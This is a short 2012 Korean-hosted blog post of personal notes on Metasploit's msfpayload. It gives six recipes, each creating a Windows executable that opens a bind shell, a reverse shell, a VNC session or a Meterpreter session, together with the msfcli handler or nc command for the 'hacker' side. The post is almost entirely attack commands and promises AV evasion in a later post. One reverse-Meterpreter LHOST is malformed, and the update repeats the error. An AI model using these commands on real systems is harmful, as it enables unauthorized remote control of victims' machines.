'msfpayload'에 해당되는 글 1건

  1. 2012.07.21 [Metasploit] Msfpayload

Metasploit Payloads - msfpayload


This entry is really just a place for me to keep notes on working msfpayload details. I will expand on this post as i get more working examples.


These payloads will be detected by AV, I will cover methods of avoiding AV detection in another post.


In my examples 192.168.1.110 is the victim, and 192.168.1.112 is the attacker. Where I have not specified the port it will default to 4444.




1. For a listening shell on the target


Create payload:

./msfpayload windows/shell_bind_tcp LPORT=2482 X > /tmp/Listen-shell.exe


Target:

run Listen-shell.exe


Hacker:

nc 192.168.1.110 2482




2. For a reverse shell on the target


Create payload:

./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.112 X > /tmp/reverse-shell.exe


Hacker:

./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.112 E


Target:

run reverse-shell.exe




3. For a VNC listener on target


Create payload:

./msfpayload windows/vncinject/bind_tcp LPORT=2482 X > Listen-vnc.exe


Target:

run Listen-vnc.exe


Hacker:

./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/bind_tcp LPORT=2482 RHOST=192.168.1.110 DisableCourtesyShell=TRUE E 




4. For a reverse VNC session


Create payload:

./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 X > /tmp/reverse-vnc.exe


Hacker:

./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 DisableCourtesyShell=TRUE E


Target:

run reverse-vnc.exe




5. For a meterpreter listener


create payload:

./msfpayload windows/meterpreter/bind_tcp LPORT=2482 X > met-listen.exe


Target:

run met-listen.exe


Hacker:

./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=192.168.1.110 LPORT=2482 E




6. For a reverse meterpreter connection (not working yet. not sure why)


Create payload:

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.112 X > /tmp/met-reverse.exe


Hacker:

./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.112 E


Target:

run met-reverse.exe



UPDATE: Payload should for 6 should read:


./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.112 LPORT=4444 X > /tmp/met-reverse.exe




'공부 > Forensics' 카테고리의 다른 글

[Metasploit]Meterpreter API Cheat Sheet  (0) 2012.07.26
[Forensics]Live Response  (1) 2012.07.25
[Metasploit] Msfpayload  (0) 2012.07.21
[Metasploit]Meterpreter (Reverse exe)  (4) 2012.07.21
[Windows]Userdump.exe  (0) 2012.07.19
[Windows]Nbtstat.exe  (0) 2012.07.19
Posted by extr

댓글을 달아 주세요